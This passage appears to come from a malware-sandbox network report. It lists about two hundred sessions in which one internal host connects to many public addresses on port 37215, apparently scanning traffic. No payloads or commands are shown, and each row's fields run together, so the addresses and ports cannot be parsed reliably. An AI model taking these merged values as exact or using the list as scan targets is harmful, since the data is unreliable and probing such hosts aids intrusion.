                                                  4337192.168.2.1355798157.56.246.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4338192.168.2.133397459.48.195.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4339192.168.2.1336434157.21.182.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4340192.168.2.134895841.233.143.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4341192.168.2.1346270157.112.67.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4342192.168.2.134643841.176.29.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4343192.168.2.134095641.49.126.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4344192.168.2.1349588197.149.223.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4345192.168.2.1348006157.37.19.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4346192.168.2.135399041.70.79.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4347192.168.2.135255441.151.147.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4348192.168.2.133332641.218.120.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4349192.168.2.133345841.238.114.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4350192.168.2.1338796189.69.176.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4351192.168.2.135194041.49.123.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4352192.168.2.1349748206.200.199.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4353192.168.2.133559241.28.87.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4354192.168.2.1346676197.89.61.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4355192.168.2.1340562157.149.162.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4356192.168.2.1346438197.250.228.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4357192.168.2.1355324197.156.161.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4358192.168.2.134229441.35.110.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4359192.168.2.1342002197.132.115.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4360192.168.2.1357386197.42.9.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4361192.168.2.1335212157.119.248.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4362192.168.2.1348320185.219.164.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4363192.168.2.1347330157.228.193.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4364192.168.2.134254490.188.22.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4365192.168.2.135071244.71.12.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4366192.168.2.134670441.145.187.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4367192.168.2.1333278120.240.35.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4368192.168.2.1350874157.16.251.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4369192.168.2.1359000131.114.171.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4370192.168.2.1335110197.72.22.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4371192.168.2.1341214197.168.51.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4372192.168.2.133931846.160.254.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4373192.168.2.1356776197.110.195.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4374192.168.2.1342272181.232.186.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4375192.168.2.1347218197.229.1.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4376192.168.2.133323041.245.253.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4377192.168.2.1356344108.122.245.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4378192.168.2.1332962157.244.129.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4379192.168.2.1343306213.34.118.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4380192.168.2.1355508117.169.112.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4381192.168.2.134241041.221.124.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4382192.168.2.1336836157.139.25.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4383192.168.2.1334922197.41.41.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4384192.168.2.1347900157.250.207.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4385192.168.2.1341114129.26.250.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4386192.168.2.135227641.22.177.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4387192.168.2.1344130113.135.158.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4388192.168.2.1356488196.227.139.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4389192.168.2.133584271.213.216.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4390192.168.2.1352078197.50.48.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4391192.168.2.1356722197.88.33.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4392192.168.2.134822841.217.183.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4393192.168.2.1343438157.104.54.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4394192.168.2.135344841.224.195.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4395192.168.2.13407602.211.147.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4396192.168.2.135120841.121.158.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4397192.168.2.135964641.103.54.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4398192.168.2.1350774115.238.92.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4399192.168.2.1353370197.124.120.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4400192.168.2.1343236157.139.141.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4401192.168.2.1333658197.162.91.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4402192.168.2.1359794187.134.91.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4403192.168.2.133742041.249.197.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4404192.168.2.1346380157.203.1.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4405192.168.2.1358846197.173.167.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4406192.168.2.135019241.82.43.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4407192.168.2.1346786197.4.107.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4408192.168.2.1353718157.11.241.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4409192.168.2.1347968197.238.46.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4410192.168.2.1335612197.120.146.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4411192.168.2.1336536197.39.148.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4412192.168.2.1357682200.58.155.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4413192.168.2.1343834197.91.170.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4414192.168.2.1341588157.109.242.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4415192.168.2.135051641.240.63.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4416192.168.2.133640841.222.166.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4417192.168.2.1358224197.79.169.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4418192.168.2.1347512108.149.58.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4419192.168.2.1343624175.84.174.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4420192.168.2.1346286171.192.157.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4421192.168.2.1350920221.224.75.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4422192.168.2.135557241.235.216.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4423192.168.2.1335174157.119.70.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4424192.168.2.134571441.134.43.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4425192.168.2.1339930197.214.57.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4426192.168.2.135018065.48.52.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4427192.168.2.1360930157.156.235.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4428192.168.2.1339872197.12.106.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4429192.168.2.1342850157.239.86.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4430192.168.2.135409841.237.96.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4431192.168.2.1350728157.36.253.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4432192.168.2.133971441.225.253.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4433192.168.2.1349410157.221.161.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4434192.168.2.133666823.227.171.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4435192.168.2.1360124197.215.84.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4436192.168.2.1356480156.170.125.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4437192.168.2.1347256197.27.82.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4438192.168.2.1338880197.66.196.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4439192.168.2.134129241.121.14.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4440192.168.2.134399041.163.136.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4441192.168.2.135547282.84.194.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4442192.168.2.1344300197.153.72.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4443192.168.2.134879241.22.225.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4444192.168.2.1360414197.224.218.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4445192.168.2.1343688197.40.125.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4446192.168.2.133310296.219.148.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4447192.168.2.135919441.186.31.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4448192.168.2.1351366157.248.81.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4449192.168.2.1351930165.231.184.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4450192.168.2.1339068157.98.49.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4451192.168.2.1356886197.42.98.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4452192.168.2.135918438.89.57.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4453192.168.2.1350222157.133.135.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4454192.168.2.1345286157.195.150.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4455192.168.2.133568641.216.74.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4456192.168.2.1333678157.22.172.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4457192.168.2.134016494.233.173.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4458192.168.2.1339836142.243.130.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4459192.168.2.1342414157.153.9.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4460192.168.2.1344706112.147.55.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4461192.168.2.133280641.70.134.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4462192.168.2.133400648.175.162.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4463192.168.2.1358662157.117.184.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4464192.168.2.1351560197.83.175.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4465192.168.2.135886694.171.25.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4466192.168.2.1340874197.25.165.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4467192.168.2.134533441.213.16.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4468192.168.2.133497641.33.13.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4469192.168.2.1356858145.93.165.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4470192.168.2.135747841.222.125.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4471192.168.2.1338888150.154.17.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4472192.168.2.133453641.13.90.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4473192.168.2.1337244178.169.47.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4474192.168.2.1335894197.77.225.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4475192.168.2.135614242.67.159.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4476192.168.2.1353780157.179.144.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4477192.168.2.1337374157.204.27.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4478192.168.2.134664241.196.60.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4479192.168.2.1359794157.216.183.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4480192.168.2.1333480157.200.235.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4481192.168.2.134376841.106.140.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4482192.168.2.1342382157.140.159.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4483192.168.2.1354248112.24.13.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4484192.168.2.1346784197.77.154.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4485192.168.2.135436278.128.14.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4486192.168.2.1349194157.247.148.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4487192.168.2.1339262157.229.37.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4488192.168.2.134384441.83.252.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4489192.168.2.1340302157.188.90.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4490192.168.2.135305241.89.187.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4491192.168.2.134601641.214.221.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4492192.168.2.133401253.32.142.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4493192.168.2.1339764186.165.138.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4494192.168.2.1354384222.36.213.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4495192.168.2.1348704197.21.91.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4496192.168.2.133856653.91.84.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4497192.168.2.1343006197.36.59.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4498192.168.2.1352082197.87.143.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4499192.168.2.1343338197.76.198.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4500192.168.2.134156217.207.174.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4501192.168.2.134565258.206.38.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4502192.168.2.1334632197.72.41.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4503192.168.2.1346444222.177.105.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4504192.168.2.1359558157.200.28.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4505192.168.2.133372641.164.212.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4506192.168.2.134561059.44.131.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4507192.168.2.1346908197.45.114.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4508192.168.2.1350876179.234.79.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4509192.168.2.1358204197.160.4.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4510192.168.2.133343885.47.54.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4511192.168.2.135862641.40.182.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4512192.168.2.1352318157.55.220.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4513192.168.2.1333414157.32.14.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4514192.168.2.135522241.48.173.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4515192.168.2.134211241.138.4.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4516192.168.2.135659441.138.86.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4517192.168.2.1336782157.209.253.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4518192.168.2.1350060157.238.63.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4519192.168.2.1344908197.189.249.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4520192.168.2.133516239.152.218.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4521192.168.2.1342730197.167.168.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4522192.168.2.1342500125.59.191.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4523192.168.2.1353370103.157.148.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4524192.168.2.1360314157.21.88.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4525192.168.2.135127241.171.175.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4526192.168.2.1336248157.19.36.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4527192.168.2.1346290147.228.51.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4528192.168.2.133777641.26.157.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4529192.168.2.1355422157.211.110.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4530192.168.2.1338582157.62.124.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4531192.168.2.1357820197.241.117.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4532192.168.2.1345964197.42.242.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4533192.168.2.1341030201.53.91.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4534192.168.2.135373641.196.89.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4535192.168.2.1353860197.233.97.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4536192.168.2.135169494.97.12.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4537192.168.2.1334288197.141.0.6737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4538192.168.2.1348424197.71.213.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4539192.168.2.135275441.191.19.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4540192.168.2.1350184157.56.145.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4541192.168.2.1357356157.196.3.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4542192.168.2.1343344157.36.11.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4543192.168.2.1343336157.151.43.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4544192.168.2.1349048182.164.135.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4545192.168.2.134401441.78.60.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4546192.168.2.1350444197.152.167.20937215
